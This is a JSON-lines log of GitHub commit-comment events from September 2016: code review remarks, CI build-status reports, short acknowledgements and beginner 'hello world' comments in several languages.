{"id":"4628465890","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19202122,"position":null,"line":null,"path":null,"commit_id":"0eb77e61d2e9a778c08e696d503a85e3e79ee155","created_at":"2016-09-28T04:39:26Z","updated_at":"2016-09-28T04:39:26Z","body":"If I might make a suggestion, shouldn't you route all of these through the same logger?\r\n\r\nYou could do something like:\r\n\r\n```python\r\nclass BaseDaemon(object):\r\n    @property\r\n    def logger(self):\r\n        return self.server.logger\r\n```"}},"created_at":"2016-09-28T04:39:26Z"}
{"id":"4628466210","type":"CommitCommentEvent","actor":{"login":"ajjahn"},"repo":{"name":"clearwater-rb/clearwater"},"payload":{"comment":{"id":19202124,"position":null,"line":null,"path":null,"commit_id":"24832608e7adc432537cc4d731a9d1326e463d76","created_at":"2016-09-28T04:39:35Z","updated_at":"2016-09-28T04:39:35Z","body":"I opened #60. It moves the callbacks back into the set_outlets method as a possible solution. It doesn't fix the failing tests though."}},"created_at":"2016-09-28T04:39:35Z"}
{"id":"4628466334","type":"CommitCommentEvent","actor":{"login":"pbr0921"},"repo":{"name":"pbr0921/sampleProject"},"payload":{"comment":{"id":19202126,"position":null,"line":null,"path":null,"commit_id":"3e1357d932105174073b79b44dab3a77e8b3fd17","created_at":"2016-09-28T04:39:39Z","updated_at":"2016-09-28T04:39:39Z","body":"test1"}},"created_at":"2016-09-28T04:39:39Z"}
{"id":"4628466567","type":"CommitCommentEvent","actor":{"login":"YoshiteruIwasaki"},"repo":{"name":"aipocom/aipo"},"payload":{"comment":{"id":19202128,"position":null,"line":null,"path":null,"commit_id":"49bc82e006c8ed1483baee90a75f77cd0905b295","created_at":"2016-09-28T04:39:46Z","updated_at":"2016-09-28T04:39:46Z","body":"[![LGTM](https://lgtm.in/p/mzkHWodXp)](https://lgtm.in/i/mzkHWodXp)\r\n"}},"created_at":"2016-09-28T04:39:46Z"}
{"id":"4628472405","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19202133,"position":null,"line":null,"path":null,"commit_id":"ce07ac97d4191c9bbf0e31055e2ceb95e656de27","created_at":"2016-09-28T04:42:25Z","updated_at":"2016-09-28T04:42:25Z","body":"Why does clock need to be an object? It has a constructor and a method which never references the object. Is there something I'm missing here?"}},"created_at":"2016-09-28T04:42:25Z"}
{"id":"4628472900","type":"CommitCommentEvent","actor":{"login":"Mr-wangchao"},"repo":{"name":"Mr-wangchao/Hello-World"},"payload":{"comment":{"id":19202135,"position":null,"line":null,"path":null,"commit_id":"6834bbcf9cb2efdf44b30ef22978a40caf5a2169","created_at":"2016-09-28T04:42:39Z","updated_at":"2016-09-28T04:42:39Z","body":"this is a first Hello World！"}},"created_at":"2016-09-28T04:42:39Z"}
{"id":"4628477210","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19202140,"position":null,"line":null,"path":null,"commit_id":"6624183a2cf32a08b19987ced3a88e57419d4489","created_at":"2016-09-28T04:44:33Z","updated_at":"2016-09-28T04:44:33Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: OK (2319 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6624183a2cf32a08b19987ced3a88e57419d4489-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6624183a2cf32a08b19987ced3a88e57419d4489-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T04:44:33Z"}
{"id":"4628478710","type":"CommitCommentEvent","actor":{"login":"Mr-wangchao"},"repo":{"name":"Mr-wangchao/Hello-World"},"payload":{"comment":{"id":19202143,"position":1,"line":1,"path":"README","commit_id":"6834bbcf9cb2efdf44b30ef22978a40caf5a2169","created_at":"2016-09-28T04:45:15Z","updated_at":"2016-09-28T04:45:15Z","body":"this is a first Hello World！"}},"created_at":"2016-09-28T04:45:15Z"}
{"id":"4628488939","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19202170,"position":null,"line":null,"path":null,"commit_id":"ed69961c29d7947d198b799319b39068a6d30502","created_at":"2016-09-28T04:49:52Z","updated_at":"2016-09-28T04:49:52Z","body":"MakeWebKitWork (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ed69961c29d7947d198b799319b39068a6d30502-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ed69961c29d7947d198b799319b39068a6d30502-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T04:49:52Z"}
{"id":"4628493713","type":"CommitCommentEvent","actor":{"login":"rahulpandeygwl"},"repo":{"name":"kevinsawicki/github-maven-example"},"payload":{"comment":{"id":19202176,"position":null,"line":null,"path":null,"commit_id":"f4b3dcf26085053c6f215b7c1d2c78712c34eabf","created_at":"2016-09-28T04:51:50Z","updated_at":"2016-09-28T04:51:50Z","body":"ON-2"}},"created_at":"2016-09-28T04:51:50Z"}
{"id":"4628495219","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-BramVV"},"payload":{"comment":{"id":19202181,"position":null,"line":null,"path":null,"commit_id":"d587f1d450d8de7f11eccff717ac3a9df2b89949","created_at":"2016-09-28T04:52:26Z","updated_at":"2016-09-28T04:52:26Z","body":":+1:\n\n\n\n\n\n\nOn Tue, Sep 27, 2016 at 11:41 PM +0200, \"BramVV\" <notifications@github.com> wrote:\n\n\n\n\n\n\n\n\n\n\n\n\nJa dat werkte, ma ik wist niet of ik het op de juiste manier had gedaan.\n\n\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n\n  \n  \n\n\n\n\n\n\n\n\n\n"}},"created_at":"2016-09-28T04:52:26Z"}
{"id":"4628495909","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19202191,"position":null,"line":null,"path":null,"commit_id":"6624183a2cf32a08b19987ced3a88e57419d4489","created_at":"2016-09-28T04:52:43Z","updated_at":"2016-09-28T04:52:43Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2287 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6624183a2cf32a08b19987ced3a88e57419d4489-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6624183a2cf32a08b19987ced3a88e57419d4489-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-91.59%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T04:52:43Z"}
{"id":"4628496392","type":"CommitCommentEvent","actor":{"login":"ronsmits"},"repo":{"name":"edvin/tornadofx"},"payload":{"comment":{"id":19202193,"position":null,"line":null,"path":null,"commit_id":"da2d8f7583bfd83435f341858244cb47a645d973","created_at":"2016-09-28T04:52:58Z","updated_at":"2016-09-28T04:52:58Z","body":":+1: "}},"created_at":"2016-09-28T04:52:58Z"}
{"id":"4628504314","type":"CommitCommentEvent","actor":{"login":"jtbandes"},"repo":{"name":"jtbandes/swift.tmbundle"},"payload":{"comment":{"id":19202202,"position":null,"line":null,"path":null,"commit_id":"daaf43e4de621029d696f3b2c0ececddafb8fd26","created_at":"2016-09-28T04:56:30Z","updated_at":"2016-09-28T04:56:30Z","body":"```swift\r\nenum Foo {\r\n  case bar\r\n  func foo() {}\r\n  case bar, baz  // x\r\nasdf  // not a constant\r\n\r\nfunc foo() {}\r\n\r\n  case bar(arg: a) // x\r\n\r\nfunc foo() {}\r\n  \r\n  case bar(arg: a),/* abc */baz(arg: c)\r\n  case bar(arg: a), /* abc */ baz(arg: c)\r\n\r\nfunc foo() {}\r\n  \r\n  case bar(arg: a), /* abc */\r\nbaz(arg: c)\r\n\r\n  case bar(arg: a), /* abc */\r\n  baz(arg: c)\r\n  \r\n  case bar(arg: a) // foo\r\n  , baz(arg: c), // foo\r\n  baz(arg: c) \r\n\r\nfunc foo() {}\r\n  \r\ncase bar(arg: a) // foo\r\n, baz(arg: c), // foo\r\nbaz(arg: c) \r\n\r\nfoo(asdf)  // this shouldn't be highlighted as a constant\r\n\r\nfunc foo() {}\r\n  \r\n}\r\n```"}},"created_at":"2016-09-28T04:56:30Z"}
{"id":"4628504853","type":"CommitCommentEvent","actor":{"login":"tiberio40"},"repo":{"name":"tiberio40/IngSoftware"},"payload":{"comment":{"id":19202203,"position":null,"line":null,"path":null,"commit_id":"29d1f4071c3a0a01edc532702fee7af2c7d41a5a","created_at":"2016-09-28T04:56:45Z","updated_at":"2016-09-28T04:56:45Z","body":":)"}},"created_at":"2016-09-28T04:56:45Z"}
{"id":"4628507231","type":"CommitCommentEvent","actor":{"login":"tsuuumi"},"repo":{"name":"tsuuumi/twitter"},"payload":{"comment":{"id":19202205,"position":null,"line":null,"path":null,"commit_id":"0fbe50665984d90b2faffdb8fce156ffffc2bbce","created_at":"2016-09-28T04:57:50Z","updated_at":"2016-09-28T04:57:50Z","body":"@norotime ありがとうございます。\r\nコミットすることを忘れてしまい、たまに慌ててまとめてやってたりすることがありましたので、気をつけます。"}},"created_at":"2016-09-28T04:57:50Z"}
{"id":"4628508444","type":"CommitCommentEvent","actor":{"login":"dzhuang"},"repo":{"name":"inducer/relate"},"payload":{"comment":{"id":19202209,"position":54,"line":165,"path":"course/grading.py","commit_id":"008dcb016c3a5f5df78cf935f7558229095904e5","created_at":"2016-09-28T04:58:20Z","updated_at":"2016-09-28T04:58:20Z","body":"This line failed when shown_grade is None."}},"created_at":"2016-09-28T04:58:20Z"}
{"id":"4628508493","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19202210,"position":null,"line":null,"path":null,"commit_id":"6624183a2cf32a08b19987ced3a88e57419d4489","created_at":"2016-09-28T04:58:21Z","updated_at":"2016-09-28T04:58:21Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6624183a2cf32a08b19987ced3a88e57419d4489-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-28T04:58:21Z"}
{"id":"4628517315","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19202216,"position":null,"line":null,"path":null,"commit_id":"4d18f595dcc9ce6f7431d8f66e39774ce6256503","created_at":"2016-09-28T05:02:04Z","updated_at":"2016-09-28T05:02:04Z","body":"Serendipity :-)"}},"created_at":"2016-09-28T05:02:04Z"}
{"id":"4628518669","type":"CommitCommentEvent","actor":{"login":"ctls123"},"repo":{"name":"ctls123/census"},"payload":{"comment":{"id":19202220,"position":null,"line":null,"path":null,"commit_id":"2c1a7468b9438cba2781193d0a51fc43f86fc774","created_at":"2016-09-28T05:02:38Z","updated_at":"2016-09-28T05:02:38Z","body":"上传需求分析和数据字典"}},"created_at":"2016-09-28T05:02:38Z"}
{"id":"4628522220","type":"CommitCommentEvent","actor":{"login":"shonumi"},"repo":{"name":"shonumi/gbe-plus"},"payload":{"comment":{"id":19202228,"position":null,"line":null,"path":null,"commit_id":"ea4e34e1c1b151f2342397363f0c45bcfffac3c4","created_at":"2016-09-28T05:04:13Z","updated_at":"2016-09-28T05:04:13Z","body":"Previously, it would only work if dragging down and to the right."}},"created_at":"2016-09-28T05:04:13Z"}
{"id":"4628524762","type":"CommitCommentEvent","actor":{"login":"Emantor"},"repo":{"name":"rohieb/StratumsphereTrayIcon"},"payload":{"comment":{"id":19202231,"position":null,"line":null,"path":null,"commit_id":"e30ed555f3d337c2d96d504f8dc1ee5e22eaa539","created_at":"2016-09-28T05:05:22Z","updated_at":"2016-09-28T05:05:22Z","body":"A non C++11 way would be\r\n```\r\nsizeof(sizes)/sizeof(size[0])\r\n```"}},"created_at":"2016-09-28T05:05:22Z"}
{"id":"4628530451","type":"CommitCommentEvent","actor":{"login":"Junyulive"},"repo":{"name":"ondrejbartas/sidekiq-cron"},"payload":{"comment":{"id":19202251,"position":10,"line":61,"path":"lib/sidekiq/cron/job.rb","commit_id":"b0c22b4562375f86275c1476646380de4982de5a","created_at":"2016-09-28T05:07:47Z","updated_at":"2016-09-28T05:07:47Z","body":"Hi Alex,\n\nSorry, I haven’t check the updates.  I just merged.\n\n\n\n-- \nSincerely\njosh.c\n\nFrom: Alexander Logvinov <notifications@github.com>\n<notifications@github.com>\nReply: ondrejbartas/sidekiq-cron\n<reply@reply.github.com>\n<reply@reply.github.com>\nDate: September 27, 2016 at 9:13:09 PM\nTo: ondrejbartas/sidekiq-cron <sidekiq-cron@noreply.github.com>\n<sidekiq-cron@noreply.github.com>\nCc: josh.c <junyu.live@gmail.com> <junyu.live@gmail.com>, Author\n<author@noreply.github.com> <author@noreply.github.com>\nSubject:  Re: [ondrejbartas/sidekiq-cron] Calling\nperform_later/perform_async for jobs (b0c22b4)\n\nHi Junyulive! I've already sent a fix for this. I thought you have seen it,\nso I decided not to update this comment. Sorry for this.\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub\n<https://github.com/ondrejbartas/sidekiq-cron/commit/b0c22b4562375f86275c1476646380de4982de5a#commitcomment-19201979>,\nor mute the thread\n<https://github.com/notifications/unsubscribe-auth/ABDRiPj1sw6iQ_QmX04Lpafyk0easpn4ks5quelVgaJpZM4KDrld>\n.\n"}},"created_at":"2016-09-28T05:07:47Z"}
{"id":"4628541275","type":"CommitCommentEvent","actor":{"login":"k920049"},"repo":{"name":"ENOW-IJI/ENOW-server"},"payload":{"comment":{"id":19202277,"position":null,"line":null,"path":null,"commit_id":"fedd3389a3e87629850a04e14293068e3fd95d67","created_at":"2016-09-28T05:12:28Z","updated_at":"2016-09-28T05:12:28Z","body":"You got me back!!"}},"created_at":"2016-09-28T05:12:28Z"}
{"id":"4628543502","type":"CommitCommentEvent","actor":{"login":"asarfraaz"},"repo":{"name":"naveenbajaj123/python"},"payload":{"comment":{"id":19202282,"position":null,"line":null,"path":null,"commit_id":"ab7ebf5fed3a22ae068151ca2847968248c93fa1","created_at":"2016-09-28T05:13:28Z","updated_at":"2016-09-28T05:13:28Z","body":"Perfect !!!\r\n\r\nOne small change I would like to see in the output. I want to have all the \"=\" symbols exactly one below the other. The last \"=\" symbol is skewed. Can you take it as a challenge to fix this anomaly ?"}},"created_at":"2016-09-28T05:13:28Z"}
{"id":"4628544498","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19202283,"position":null,"line":null,"path":null,"commit_id":"2042ee6458bd93f50e0e569ae109c53d06638f13","created_at":"2016-09-28T05:13:52Z","updated_at":"2016-09-28T05:13:52Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/2042ee6458bd93f50e0e569ae109c53d06638f13#commitcomment-19201880) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/0c208a1f19c97b11c57c6c6a7074d146399b7b89/daily_2016_9_28/report.md). cc @jrevels"}},"created_at":"2016-09-28T05:13:52Z"}
{"id":"4628545891","type":"CommitCommentEvent","actor":{"login":"asarfraaz"},"repo":{"name":"naveenbajaj123/python"},"payload":{"comment":{"id":19202290,"position":null,"line":null,"path":null,"commit_id":"a94dca86f1f9ca4b4bc089b1c32390560b31d763","created_at":"2016-09-28T05:14:29Z","updated_at":"2016-09-28T05:14:29Z","body":"Perfect !!!\r\n\r\nOne small change I would like to see in the output. I want to have all the \"=\" symbols exactly one below the other. The last \"=\" symbol is skewed. Can you take it as a challenge to fix this anomaly ?"}},"created_at":"2016-09-28T05:14:29Z"}
{"id":"4628547805","type":"CommitCommentEvent","actor":{"login":"JadeMiao"},"repo":{"name":"NTASTE/H-background-theme"},"payload":{"comment":{"id":19202302,"position":null,"line":null,"path":null,"commit_id":"ac8950fa694a03b52d308300f152790123a2d4d7","created_at":"2016-09-28T05:15:18Z","updated_at":"2016-09-28T05:15:18Z","body":"哈喽，为啥下载到的文件会损坏呢？一直下载不到呢"}},"created_at":"2016-09-28T05:15:18Z"}
{"id":"4628554383","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19202314,"position":null,"line":null,"path":null,"commit_id":"6f9687221220804678df8fb124ce3ff22815fc11","created_at":"2016-09-28T05:17:55Z","updated_at":"2016-09-28T05:17:55Z","body":"MakeWebKitWork (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f9687221220804678df8fb124ce3ff22815fc11-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f9687221220804678df8fb124ce3ff22815fc11-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T05:17:55Z"}
{"id":"4628560203","type":"CommitCommentEvent","actor":{"login":"rouson"},"repo":{"name":"sourceryinstitute/opencoarrays"},"payload":{"comment":{"id":19202329,"position":null,"line":null,"path":null,"commit_id":"23a15beadc5d2a9e22123a5fb988791c728cd462","created_at":"2016-09-28T05:20:21Z","updated_at":"2016-09-28T05:20:21Z","body":":clap: \r\n\r\nAndre, Zaak and I confirmed today that the latest version of this pull request passes all tests when compiled with GCC 6.1.0.  That's an extremely important step in terms of backwards compatibility.  I still need to addd a check in our installation script to disallow building with 7.0.0 for now, but the current results are sufficient for approving this pull request so I will do so. "}},"created_at":"2016-09-28T05:20:21Z"}
{"id":"4628564983","type":"CommitCommentEvent","actor":{"login":"wooes23"},"repo":{"name":"wooes23/p1"},"payload":{"comment":{"id":19202342,"position":null,"line":null,"path":null,"commit_id":"08ae6759fb1efc29dc767bdf62a5067d09ac0ed6","created_at":"2016-09-28T05:22:20Z","updated_at":"2016-09-28T05:22:20Z","body":"이게 엄청 어려워요 "}},"created_at":"2016-09-28T05:22:20Z"}
{"id":"4628565810","type":"CommitCommentEvent","actor":{"login":"ArsenShnurkov"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19202344,"position":null,"line":null,"path":null,"commit_id":"d44879348f8de1661aa3879c11304219648fc574","created_at":"2016-09-28T05:22:40Z","updated_at":"2016-09-28T05:22:40Z","body":"How to fix this bug:\r\nhttps://bugzilla.xamarin.com/show_bug.cgi?id=31550\r\nsee also https://stackoverflow.com/questions/30417128/mono-4-3-1-2-worked-fine-could-not-load-type-microsoft-csharp-runtimebinder-r\r\n?"}},"created_at":"2016-09-28T05:22:40Z"}
{"id":"4628567655","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19202349,"position":null,"line":null,"path":null,"commit_id":"6f9687221220804678df8fb124ce3ff22815fc11","created_at":"2016-09-28T05:23:27Z","updated_at":"2016-09-28T05:23:27Z","body":"MakeWebKitWork (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f9687221220804678df8fb124ce3ff22815fc11-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-28T05:23:27Z"}
{"id":"4628568238","type":"CommitCommentEvent","actor":{"login":"Mage6"},"repo":{"name":"Mage6/app1"},"payload":{"comment":{"id":19202354,"position":null,"line":null,"path":null,"commit_id":"1dbcf7fb889b8120e8ed46672e0c908a35376e49","created_at":"2016-09-28T05:23:42Z","updated_at":"2016-09-28T05:23:42Z","body":"[Uploading app.zip…]()\r\n"}},"created_at":"2016-09-28T05:23:42Z"}
{"id":"4628574871","type":"CommitCommentEvent","actor":{"login":"kegebai"},"repo":{"name":"ltebean/LTNavigationBar"},"payload":{"comment":{"id":19202361,"position":null,"line":null,"path":null,"commit_id":"5db4c033ab89b174d58640fe4fcfacfd689f8201","created_at":"2016-09-28T05:26:26Z","updated_at":"2016-09-28T05:26:26Z","body":"谢谢， 已解决\r\n\r\n        [self setBackgroundImage:[UIImage new] forBarMetrics:UIBarMetricsDefault];\r\n        self.overlay = [[UIView alloc] initWithFrame:CGRectMake(0, -20, [UIScreen mainScreen].bounds.size.width, CGRectGetHeight(self.bounds) + 20)];\r\n        self.overlay.userInteractionEnabled = NO;\r\n        self.overlay.autoresizingMask = UIViewAutoresizingFlexibleWidth | UIViewAutoresizingFlexibleHeight;\r\n        [[self.subviews firstObject] insertSubview:self.overlay atIndex:0];"}},"created_at":"2016-09-28T05:26:26Z"}
{"id":"4628579771","type":"CommitCommentEvent","actor":{"login":"naufalizee"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19202368,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-28T05:28:29Z","updated_at":"2016-09-28T05:28:29Z","body":"oh i see it's okay then \r\nwaiting for find own dragon it will be great :D"}},"created_at":"2016-09-28T05:28:29Z"}
{"id":"4628580983","type":"CommitCommentEvent","actor":{"login":"warmhug"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":19202371,"position":38,"line":28,"path":"components/icon/index.web.tsx","commit_id":"68a7f2b32d9cfd868234b2317964dd58800d98ab","created_at":"2016-09-28T05:28:59Z","updated_at":"2016-09-28T05:28:59Z","body":"可以都先用 background-Image 来做？这样引入好像是不对的"}},"created_at":"2016-09-28T05:28:59Z"}
{"id":"4628581244","type":"CommitCommentEvent","actor":{"login":"efrain172"},"repo":{"name":"efrain17/impre"},"payload":{"comment":{"id":19202372,"position":null,"line":null,"path":null,"commit_id":"fc23f6319515f4900acf507d2dc960a9898a454e","created_at":"2016-09-28T05:29:06Z","updated_at":"2016-09-28T05:29:06Z","body":"bien"}},"created_at":"2016-09-28T05:29:06Z"}
{"id":"4628586898","type":"CommitCommentEvent","actor":{"login":"geekymehul"},"repo":{"name":"geekymehul/hello-world"},"payload":{"comment":{"id":19202393,"position":null,"line":null,"path":null,"commit_id":"86fa879ea8408833f5aac8b6ffbc50a710944364","created_at":"2016-09-28T05:31:16Z","updated_at":"2016-09-28T05:31:16Z","body":"#include<stdio.h>\r\nvoid main()\r\n{\r\n printf(\"hello world\");\r\n}"}},"created_at":"2016-09-28T05:31:16Z"}
{"id":"4628587144","type":"CommitCommentEvent","actor":{"login":"edj-boston"},"repo":{"name":"edj-boston/coursera-r-programming"},"payload":{"comment":{"id":19202394,"position":null,"line":null,"path":null,"commit_id":"223ce95a00a3fdb3baa20cd280ebecb1a01a3a66","created_at":"2016-09-28T05:31:22Z","updated_at":"2016-09-28T05:31:22Z","body":"Good point. This repo is a couple years old. It predates the date on that honor code. But I'll take it down just in case."}},"created_at":"2016-09-28T05:31:22Z"}
{"id":"4628587618","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Adgam/CSharp"},"payload":{"comment":{"id":19202396,"position":28,"line":28,"path":"Дополнительное задание 1/Figures/Triangle.cs","commit_id":"1a731b61df3c008d131b3ff61405b5e677daed27","created_at":"2016-09-28T05:31:34Z","updated_at":"2016-09-28T05:31:34Z","body":"Методы лучше называть глаголом, Create вместо Creation, Get вместо Getting и т.д."}},"created_at":"2016-09-28T05:31:34Z"}
{"id":"4628589467","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Adgam/CSharp"},"payload":{"comment":{"id":19202405,"position":23,"line":23,"path":"Дополнительное задание 1/Figures/Triangle.cs","commit_id":"1a731b61df3c008d131b3ff61405b5e677daed27","created_at":"2016-09-28T05:32:20Z","updated_at":"2016-09-28T05:32:20Z","body":"Хорошо бы указать причину в message"}},"created_at":"2016-09-28T05:32:20Z"}
{"id":"4628593867","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":19202414,"position":38,"line":28,"path":"components/icon/index.web.tsx","commit_id":"68a7f2b32d9cfd868234b2317964dd58800d98ab","created_at":"2016-09-28T05:34:12Z","updated_at":"2016-09-28T05:34:12Z","body":"background-Image 改颜色很麻烦吧。"}},"created_at":"2016-09-28T05:34:12Z"}
{"id":"4628605009","type":"CommitCommentEvent","actor":{"login":"fiza200"},"repo":{"name":"klcodanr/Jekyll-Disqus-Forum"},"payload":{"comment":{"id":19202429,"position":null,"line":null,"path":null,"commit_id":"51a5aa03c439e57cedfebb68a4ac893782b392d6","created_at":"2016-09-28T05:38:41Z","updated_at":"2016-09-28T05:38:41Z","body":"thanks and I will try it.\r\nhttp://www.pakistanjobs.pk/technical-jobs-a92"}},"created_at":"2016-09-28T05:38:41Z"}
{"id":"4628605932","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19202432,"position":null,"line":null,"path":null,"commit_id":"ed69961c29d7947d198b799319b39068a6d30502","created_at":"2016-09-28T05:39:04Z","updated_at":"2016-09-28T05:39:04Z","body":"MakeWebKitWork (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ed69961c29d7947d198b799319b39068a6d30502-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ed69961c29d7947d198b799319b39068a6d30502-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T05:39:04Z"}
{"id":"4628606051","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19202433,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-28T05:39:07Z","updated_at":"2016-09-28T05:39:07Z","body":"in research will be next patch may be\r\njust now use manual to puase when found own dragon"}},"created_at":"2016-09-28T05:39:07Z"}
{"id":"4628606193","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Adgam/CSharp"},"payload":{"comment":{"id":19202434,"position":28,"line":28,"path":"Дополнительное задание 1/Test/TestTriangle.cs","commit_id":"1a731b61df3c008d131b3ff61405b5e677daed27","created_at":"2016-09-28T05:39:10Z","updated_at":"2016-09-28T05:39:10Z","body":"В названии теста надо писать так \"Должно бросаться исключение, когда некоректные аргументы\", вместо \"Проверяем создание треугольника с некорректными аргументами\"\r\nНужно название примерно такое, слово тест присать не обязательно\r\nShouldThrowExceptionWhenSideLengthLessOrEqualsThanZero"}},"created_at":"2016-09-28T05:39:10Z"}
{"id":"4628606519","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Adgam/CSharp"},"payload":{"comment":{"id":19202436,"position":8,"line":8,"path":"Дополнительное задание 1/Test/TestTriangle.cs","commit_id":"1a731b61df3c008d131b3ff61405b5e677daed27","created_at":"2016-09-28T05:39:18Z","updated_at":"2016-09-28T05:39:18Z","body":"TriangleTests"}},"created_at":"2016-09-28T05:39:18Z"}
{"id":"4628607031","type":"CommitCommentEvent","actor":{"login":"tawsif93"},"repo":{"name":"IITDU-Amit/project-seat-planning"},"payload":{"comment":{"id":19202439,"position":null,"line":null,"path":null,"commit_id":"b48b34423d94904bd55dac33bd6829e8e12ccf04","created_at":"2016-09-28T05:39:31Z","updated_at":"2016-09-28T05:39:31Z","body":"@AliZafar120  ## SRS complete ? "}},"created_at":"2016-09-28T05:39:31Z"}
{"id":"4628608622","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Adgam/CSharp"},"payload":{"comment":{"id":19202443,"position":47,"line":47,"path":"Дополнительное задание 1/Test/TestTriangle.cs","commit_id":"1a731b61df3c008d131b3ff61405b5e677daed27","created_at":"2016-09-28T05:40:08Z","updated_at":"2016-09-28T05:40:08Z","body":"Вот этот текст комментария неплохо выбрасывать в message у эксепшена"}},"created_at":"2016-09-28T05:40:08Z"}
